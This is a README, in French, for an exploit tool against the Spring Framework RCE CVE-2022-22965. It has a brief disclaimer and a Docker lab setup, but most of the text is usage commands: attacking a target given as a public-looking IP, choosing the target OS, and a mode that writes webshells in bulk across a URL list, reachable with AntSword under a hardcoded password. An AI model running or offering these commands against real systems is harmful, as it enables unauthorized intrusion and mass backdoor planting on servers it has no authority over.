
Vulnérabilité RCE du framework Spring CVE-2022-22965
Périmètre d'impact : framework Spring et ses dérivés avec JDK >= 9
Ce script est fourni uniquement à des fins d'apprentissage. L'auteur décline toute responsabilité légale en cas d'utilisation abusive.
pip3 install -r requirements.txt
$ python3 spring-core-rce.py -h
.----..-.-. .---. .-..-. .-..----. .----. .---. .---. .----. .---. .----..----.
{ {__-`| } }}} }}_}{ || \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\ {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-' `-'-' `-'`-' `-'`----' `----' `---' `-'-' `----' `-'-' `----'`----'
Spring framework Core RCE
By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]
Guide d'aide Spring framework Core 0day RCE
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Spécifier l'URL
-s SYSTEM, --system SYSTEM
Spécifier le système d'exploitation cible, par défaut linux, valeurs possibles : win/linux
-r FILE, --file FILE Spécifier un fichier contenant des URLs, pour l'écriture de webshell en masse
Détection non intrusive
-u, --url ou utiliser -f, --file pour une détection par lots
-c, --check, paramètre pour un service HTTP auto-hébergé, vous pouvez utiliser
python3 -m http.server 80pour lancer rapidement un serveur webPrincipalement utilisé en interne et lorsqu'une détection non intrusive de la vulnérabilité est requise
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

Utiliser -u pour spécifier l'URL, -s pour spécifier le système d'exploitation. Valeurs possibles : linux ou win, par défaut linux.
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"


Utiliser -r pour l'écriture de webshell en masse. Connexion avec AntSword, mot de passe : k3rwin
python3 spring-core-rce.py -r "urls.txt"


docker pull vulfocus/spring-core-rce-2022-03-29:latest
docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29